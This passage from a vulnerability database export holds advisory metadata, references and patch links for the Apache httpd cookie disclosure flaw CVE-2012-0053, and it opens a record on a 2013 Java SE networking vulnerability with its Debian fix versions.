Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n", "sources": [ { "db": "NVD", "id": "CVE-2012-0053" }, { "db": "JVNDB", "id": "JVNDB-2012-001258" }, { "db": "BID", "id": "51706" }, { "db": "VULMON", "id": "CVE-2012-0053" }, { "db": "PACKETSTORM", "id": "120980" }, { "db": "PACKETSTORM", "id": "109731" }, { "db": "PACKETSTORM", "id": "121573" }, { "db": "PACKETSTORM", "id": "112503" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "111293" }, { "db": "PACKETSTORM", "id": "109725" }, { "db": "PACKETSTORM", "id": "119095" }, { "db": "PACKETSTORM", "id": "113582" } ], "trust": 2.79 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=18442", "trust": 0.1, "type": "exploit" } ], "sources": [ { "db": "VULMON", "id": "CVE-2012-0053" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2012-0053", "trust": 3.0 }, { "db": "JUNIPER", "id": "JSA10585", "trust": 1.3 }, { "db": "BID", "id": "51706", "trust": 1.3 }, { "db": "SECUNIA", "id": "48551", "trust": 1.0 }, { "db": "JVNDB", "id": "JVNDB-2012-001258", "trust": 0.8 }, { "db": "HITACHI", "id": "HS12-033", "trust": 0.4 }, { "db": "JUNIPER", "id": "JSA10642", "trust": 0.3 }, { "db": "SECUNIA", "id": "51626", "trust": 0.2 }, { "db": "VULMON", "id": "CVE-2012-0053", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "120980", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "109731", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "121573", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "112503", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "114272", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "111293", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "109725", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "119095", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "113582", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2012-0053" }, { "db": "BID", "id": "51706" }, { "db": "JVNDB", "id": "JVNDB-2012-001258" }, { "db": "PACKETSTORM", "id": "120980" }, { "db": "PACKETSTORM", "id": "109731" }, { "db": "PACKETSTORM", "id": "121573" }, { "db": "PACKETSTORM", "id": "112503" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "111293" }, { "db": "PACKETSTORM", "id": "109725" }, { "db": "PACKETSTORM", "id": "119095" }, { "db": "PACKETSTORM", "id": "113582" }, { "db": "NVD", "id": "CVE-2012-0053" } ] }, "id": "VAR-201201-0038", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.37425759 }, "last_update_date": "2024-07-04T22:29:48.615000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Fixed in Apache httpd 2.2.22-dev", "trust": 0.8, "url": "http://httpd.apache.org/security/vulnerabilities_22.html" }, { "title": "1235454", "trust": 0.8, "url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1235454" }, { "title": "APPLE-SA-2012-09-19-2", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2012/sep/msg00004.html" }, { "title": "HT5501", "trust": 0.8, "url": "http://support.apple.com/kb/ht5501" }, { "title": "HT5501", "trust": 0.8, "url": "http://support.apple.com/kb/ht5501?viewlocale=ja_jp" }, { "title": "HS12-033", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs12-033/index.html" }, { "title": "HS13-001", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs13-001/index.html" }, { "title": "HPSBST02848 SSRT101112", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03691745" }, { "title": "HPSBMU02786 SSRT100877", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03360041" }, { "title": "openSUSE-SU-2012:0314", "trust": 0.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2012-02/msg00026.html" }, { "title": "Oracle Critical Patch Update Advisory - January 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html" }, { "title": "Text Form of Oracle Critical Patch Update - January 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015verbose-1972976.html" }, { "title": "Oracle Critical Patch Update Advisory - July 2012", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html" }, { "title": "Bug 785069", "trust": 0.8, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=785069" }, { "title": "RHSA-2012:0128", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2012-0128.html" }, { "title": "CVE-2012-0053 Information Disclosure vulnerability in Apache HTTP Server ", "trust": 0.8, "url": "https://blogs.oracle.com/sunsecurity/entry/cve_2012_0053_information_disclosure" }, { "title": "January 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/january_2015_critical_patch_update" }, { "title": "Multiple vulnerabilities in Apache HTTP Server 1.3", "trust": 0.8, "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_apache_http1" }, { "title": "JSA10585", "trust": 0.8, "url": "http://kb.juniper.net/jsa10585" }, { "title": "HS12-033", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs12-033/index.html" }, { "title": "HS13-001", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs13-001/index.html" }, { "title": "Interstage HTTP Server: \u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u8106\u5f31\u6027(CVE-2012-0053)", "trust": 0.8, "url": "http://software.fujitsu.com/jp/security/products-fujitsu/solution/interstage_as_201203.html" }, { "title": "Red Hat: Moderate: httpd security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20120323 - security advisory" }, { "title": "Red Hat: Moderate: httpd security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20120128 - security advisory" }, { "title": "Red Hat: Moderate: httpd security and bug fix update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20120542 - security advisory" }, { "title": "Amazon Linux AMI: ALAS-2012-046", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2012-046" }, { "title": "Ubuntu Security Notice: apache2 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1368-1" }, { "title": "xss_payloads", "trust": 0.1, "url": "https://github.com/nettitude/xss_payloads " }, { "title": "CVE20120053Demo", "trust": 0.1, "url": "https://github.com/jonathansp/cve20120053demo " }, { "title": "Apache-Vulns", "trust": 0.1, "url": "https://github.com/styx00/apache-vulns " }, { "title": "https://github.com/goddemondemongod/Sec-Interview", "trust": 0.1, "url": "https://github.com/goddemondemongod/sec-interview " } ], "sources": [ { "db": "VULMON", "id": "CVE-2012-0053" }, { "db": "JVNDB", "id": "JVNDB-2012-001258" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 }, { "problemtype": "CWE-264", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001258" }, { "db": "NVD", "id": "CVE-2012-0053" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.3, "url": "http://httpd.apache.org/security/vulnerabilities_22.html" }, { "trust": 1.3, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03360041" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2012-0128.html" }, { "trust": 1.1, "url": "http://rhn.redhat.com/errata/rhsa-2012-0543.html" }, { "trust": 1.0, "url": "http://kb.juniper.net/jsa10585" }, { "trust": 1.0, "url": "http://lists.apple.com/archives/security-announce/2012/sep/msg00004.html" }, { "trust": 1.0, "url": "http://lists.opensuse.org/opensuse-security-announce/2012-02/msg00026.html" }, { "trust": 1.0, "url": "http://lists.opensuse.org/opensuse-security-announce/2012-03/msg00002.html" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=133294460209056\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=133494237717847\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=133951357207000\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=136441204617335\u0026w=2" }, { "trust": 1.0, "url": "http://rhn.redhat.com/errata/rhsa-2012-0542.html" }, { "trust": 1.0, "url": "http://secunia.com/advisories/48551" }, { "trust": 1.0, "url": "http://support.apple.com/kb/ht5501" }, { "trust": 1.0, "url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1235454" }, { "trust": 1.0, "url": "http://www.debian.org/security/2012/dsa-2405" }, { "trust": 1.0, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2012:012" }, { "trust": 1.0, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2013:150" }, { "trust": 1.0, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html" }, { "trust": 1.0, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html" }, { "trust": 1.0, "url": "http://www.securityfocus.com/bid/51706" }, { "trust": 1.0, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=785069" }, { "trust": 1.0, "url": "https://lists.apache.org/thread.html/54a42d4b01968df1117cea77fc53d6beb931c0e05936ad02af93e9ac%40%3ccvs.httpd.apache.org%3e" }, { "trust": 1.0, "url": "https://lists.apache.org/thread.html/5df9bfb86a3b054bb985a45ff9250b0332c9ecc181eec232489e7f79%40%3ccvs.httpd.apache.org%3e" }, { "trust": 1.0, "url": "https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f%40%3ccvs.httpd.apache.org%3e" }, { "trust": 1.0, "url": "https://lists.apache.org/thread.html/f7f95ac1cd9895db2714fa3ebaa0b94d0c6df360f742a40951384a53%40%3ccvs.httpd.apache.org%3e" }, { "trust": 1.0, "url": "https://lists.apache.org/thread.html/r0276683d8e1e07153fc8642618830ac0ade85b9ae0dc7b07f63bb8fc%40%3ccvs.httpd.apache.org%3e" }, { "trust": 1.0, "url": "https://lists.apache.org/thread.html/r05b5357d1f6bd106f41541ee7d87aafe3f5ea4dc3e9bde5ce09baff8%40%3ccvs.httpd.apache.org%3e" }, { "trust": 1.0, "url": "https://lists.apache.org/thread.html/r1d201e3da31a2c8aa870c8314623caef7debd74a13d0f25205e26f15%40%3ccvs.httpd.apache.org%3e" }, { "trust": 1.0, "url": "https://lists.apache.org/thread.html/r2cb985de917e7da0848c440535f65a247754db8b2154a10089e4247b%40%3ccvs.httpd.apache.org%3e" }, { "trust": 1.0, "url": "https://lists.apache.org/thread.html/r476d175be0aaf4a17680ef98c5153b4d336eaef76fb2224cc94c463a%40%3ccvs.httpd.apache.org%3e" }, { "trust": 1.0, "url": "https://lists.apache.org/thread.html/r57608dc51b79102f3952ae06f54d5277b649c86d6533dcd6a7d201f7%40%3ccvs.httpd.apache.org%3e" }, { "trust": 1.0, "url": "https://lists.apache.org/thread.html/r5f9c22f9c28adbd9f00556059edc7b03a5d5bb71d4bb80257c0d34e4%40%3ccvs.httpd.apache.org%3e" }, { "trust": 1.0, "url": "https://lists.apache.org/thread.html/r75cbe9ea3e2114e4271bbeca7aff96117b50c1b6eb7c4772b0337c1f%40%3ccvs.httpd.apache.org%3e" }, { "trust": 1.0, "url": "https://lists.apache.org/thread.html/r8828e649175df56f1f9e3919938ac7826128525426e2748f0ab62feb%40%3ccvs.httpd.apache.org%3e" }, { "trust": 1.0, "url": "https://lists.apache.org/thread.html/r9b4b963760a3cb5a4a70c902f325c6c0337fe51d5b8570416f8f8729%40%3ccvs.httpd.apache.org%3e" }, { "trust": 1.0, "url": "https://lists.apache.org/thread.html/r9e8622254184645bc963a1d47c5d47f6d5a36d6f080d8d2c43b2b142%40%3ccvs.httpd.apache.org%3e" }, { "trust": 1.0, "url": "https://lists.apache.org/thread.html/r9ea3538f229874c80a10af473856a81fbf5f694cd7f471cc679ba70b%40%3ccvs.httpd.apache.org%3e" }, { "trust": 1.0, "url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920%40%3ccvs.httpd.apache.org%3e" }, { "trust": 1.0, "url": "https://lists.apache.org/thread.html/rad01d817195e6cc871cb1d73b207ca326379a20a6e7f30febaf56d24%40%3ccvs.httpd.apache.org%3e" }, { "trust": 1.0, "url": "https://lists.apache.org/thread.html/rb9c9f42dafa25d2f669dac2a536a03f2575bc5ec1be6f480618aee10%40%3ccvs.httpd.apache.org%3e" }, { "trust": 1.0, "url": "https://lists.apache.org/thread.html/rdca61ae990660bacb682295f2a09d34612b7bb5f457577fe17f4d064%40%3ccvs.httpd.apache.org%3e" }, { "trust": 1.0, "url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9%40%3ccvs.httpd.apache.org%3e" }, { "trust": 1.0, "url": "https://lists.apache.org/thread.html/rfbaf647d52c1cb843e726a0933f156366a806cead84fbd430951591b%40%3ccvs.httpd.apache.org%3e" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0053" }, { "trust": 0.8, "url": "http://jvn.jp/cert/jvnvu381963/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-0053" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0053" }, { "trust": 0.6, "url": "http://support.avaya.com/css/p8/documents/100158872" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3607" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0031" }, { "trust": 0.5, "url": "http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.5, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4317" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0021" }, { "trust": 0.4, "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs12-033/index.html" }, { "trust": 0.4, "url": "https://h20566.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.3, "url": "https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c03691745" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10642\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://httpd.apache.org/" }, { "trust": 0.3, "url": "http://mail-archives.apache.org/mod_mbox/httpd-announce/201307.mbox/%3c20130710124920.2b8793ed.wrowe%40rowe-clan.net%3e" }, { "trust": 0.3, "url": "http://httpd.apache.org/security/vulnerabilities_20.html" }, { "trust": 0.3, "url": "https://h20565.www2.hp.com/portal/site/hpsc/template.page/public/kb/docdisplay/?javax.portlet.tpst=ba847bafb2a2d782fcbb0710b053ce01\u0026javax.portlet.prp_ba847bafb2a2d782fcbb0710b053ce01=wsrp-navigational" }, { "trust": 0.3, "url": "http://www.sophos.com/en-us/support/knowledgebase/119773.aspx" }, { "trust": 0.3, "url": "http://www.xerox.com/download/security/security-bulletin/16aeb-4cd3628b94080/cert_xrx12-009_v1.1.pdf" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10585" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100157326" }, { "trust": 0.3, "url": "http://h20565.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c03231301\u0026ac.admitted=1332965374461.876444892.492883150" }, { "trust": 0.3, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03315912" }, { "trust": 0.3, "url": "http://www.fujitsu.com/global/support/software/security/products-f/interstage-201203e.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004302" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15273.html" }, { "trust": 0.3, "url": "http://www.coresecurity.com/advisories/sophos-web-protection-appliance-multiple-vulnerabilities" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4108" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4619" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4576" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3368" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2011-3607.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-0053.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.2, "url": "http://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-0031.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0036" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2016" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0057" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4078" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1165" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4885" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2834" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1944" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2014" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0830" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4153" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1823" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2013" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4415" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4577" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0027" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2012" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2015" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3379" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2821" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-4317.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3639" }, { "trust": 0.1, "url": "https://access.redhat.com/kb/docs/doc-11259" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3639.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2011-1391.html" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-ac3d1f80b8dd48b792bfc01a08" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3368.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2011-1330.html" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=webserver\u0026downloadtype=securitypatches\u0026version=1.0.2" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3348" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3348.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0021.html" }, { "trust": 0.1, "url": "http://h20566.www2.hp.com/portal/site/hpsc/template.page/public/psi/swddetail" }, { "trust": 0.1, "url": "https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c02964430" }, { "trust": 0.1, "url": "https://www.hp.com/go/swa" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0021" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4317" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0031" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-3607" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-3368" }, { "trust": 0.1, "url": "http://secunia.com/advisories/51626/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_intelligence/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/personal/" }, { "trust": 0.1, "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=51626" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/blog/325/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/51626/#comments" }, { "trust": 0.1, "url": "http://secunia.com/advisories/about_secunia_advisories/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2110" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1473" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-e41b71e6cfbe471dbd029deaab" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0050" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1583" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0884" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3192" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2691" } ], "sources": [ { "db": "BID", "id": "51706" }, { "db": "JVNDB", "id": "JVNDB-2012-001258" }, { "db": "PACKETSTORM", "id": "120980" }, { "db": "PACKETSTORM", "id": "109731" }, { "db": "PACKETSTORM", "id": "121573" }, { "db": "PACKETSTORM", "id": "112503" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "111293" }, { "db": "PACKETSTORM", "id": "109725" }, { "db": "PACKETSTORM", "id": "119095" }, { "db": "PACKETSTORM", "id": "113582" }, { "db": "NVD", "id": "CVE-2012-0053" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2012-0053" }, { "db": "BID", "id": "51706" }, { "db": "JVNDB", "id": "JVNDB-2012-001258" }, { "db": "PACKETSTORM", "id": "120980" }, { "db": "PACKETSTORM", "id": "109731" }, { "db": "PACKETSTORM", "id": "121573" }, { "db": "PACKETSTORM", "id": "112503" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "111293" }, { "db": "PACKETSTORM", "id": "109725" }, { "db": "PACKETSTORM", "id": "119095" }, { "db": "PACKETSTORM", "id": "113582" }, { "db": "NVD", "id": "CVE-2012-0053" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-01-28T00:00:00", "db": "VULMON", "id": "CVE-2012-0053" }, { "date": "2012-01-23T00:00:00", "db": "BID", "id": "51706" }, { "date": "2012-02-01T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001258" }, { "date": "2013-03-28T02:15:29", "db": "PACKETSTORM", "id": "120980" }, { "date": "2012-02-13T22:08:05", "db": "PACKETSTORM", "id": "109731" }, { "date": "2013-05-09T14:44:00", "db": "PACKETSTORM", "id": "121573" }, { "date": "2012-05-07T20:02:40", "db": "PACKETSTORM", "id": "112503" }, { "date": "2012-06-28T03:39:12", "db": "PACKETSTORM", "id": "114272" }, { "date": "2012-03-29T03:38:57", "db": "PACKETSTORM", "id": "111293" }, { "date": "2012-02-13T21:12:34", "db": "PACKETSTORM", "id": "109725" }, { "date": "2012-12-27T07:16:59", "db": "PACKETSTORM", "id": "119095" }, { "date": "2012-06-12T22:49:22", "db": "PACKETSTORM", "id": "113582" }, { "date": "2012-01-28T04:05:00.797000", "db": "NVD", "id": "CVE-2012-0053" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2012-0053" }, { "date": "2015-04-13T21:30:00", "db": "BID", "id": "51706" }, { "date": "2015-01-30T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001258" }, { "date": "2023-11-07T02:09:53.063000", "db": "NVD", "id": "CVE-2012-0053" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "51706" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Apache HTTP Server of protocol.c In HTTPOnly Cookie Vulnerability that gets the value of", "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001258" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "arbitrary", "sources": [ { "db": "PACKETSTORM", "id": "109731" }, { "db": "PACKETSTORM", "id": "121573" }, { "db": "PACKETSTORM", "id": "112503" }, { "db": "PACKETSTORM", "id": "114272" } ], "trust": 0.4 } }
var-201306-0250
Vulnerability from variot
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier and 6 Update 45 and earlier, and OpenJDK 7, allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Networking. NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to improper enforcement of exclusive port binds when running on Windows, which allows attackers to bind to ports that are already in use. This issue affects the 'Networking' sub-component. This vulnerability affects the following supported versions: 7 Update 21 , 6 Update 45.
For the oldstable distribution (squeeze), these problems have been fixed in version 6b27-1.12.6-1~deb6u1.
For the stable distribution (wheezy), these problems have been fixed in version 6b27-1.12.6-1~deb7u1.
For the unstable distribution (sid), these problems have been fixed in version 6b27-1.12.6-1.
